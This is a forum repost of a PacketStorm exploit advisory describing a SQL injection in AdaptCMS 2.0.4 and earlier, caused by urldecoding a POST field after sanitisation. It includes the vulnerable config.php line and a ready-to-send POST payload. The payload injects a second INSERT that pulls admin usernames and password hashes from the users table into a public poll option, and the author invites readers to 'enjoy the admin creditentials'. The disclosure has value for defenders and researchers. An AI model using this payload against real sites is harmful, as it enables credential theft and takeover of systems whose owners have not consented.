Praetorian503 Posted February 3, 2013 Report Posted February 3, 2013 AdaptCMS versions 2.0.4 and below suffer from a remote SQL injection vulnerability.# Exploit Title: AdaptCMS <= 2.0.4 SQL Injection vulnerability# Date: 26/10/2012# Exploit Author: Kallimero# Vendor Homepage: http://www.adaptcms.com/# Software Link: http://www.insanevisions.com/page/3/Downloads/# Version: 2.0.4# Tested on: DebianIntroduction============As you know, I love fun and tricky SQL injections.AdaptCMS is vulnerable to a really unusual one.The vuln========First let's see the code :---------------[config.php]---------------Line 34 :array_map('clean', $_POST);---------------[config.php]---------------clean() acts like addslashes.But a couple of lines after:---------------[config.php]---------------ligne 111: mysql_query("INSERT INTO ".$pre."polls VALUES (null,'".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '','".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')");---------------[config.php]---------------w00t an SQL injection. $_POST['question'] is urldecoded after thesuperglobal's clean. That's why we can easily inject our SQL request.(Without ENT_QUOTES, the simple quote pass through htmlentities() ).The PoC :=========Ok, now we have to add a second INSERT query, to insert a custom choice inthe poll, which obviously contain the admin creditentials.A simple POST http request such as:article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660),(null, 0, (select concat(username, 0x3a, password) from adapt_users),'option', '', 1, 1337, 1349597648 )-- -Now check homepage, and enjoy the admin creditentials.How to Fix ?============There is many SQL injections in this CMS ($_SERVER vars are vulnerables aswell), and others funkies vulnz.changing your cms seems appropriate until they fix thoses issues.Thanks=========All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0,gr4ph0s.Please visit : http://www.orgasm.re/Source: PacketStorm Quote
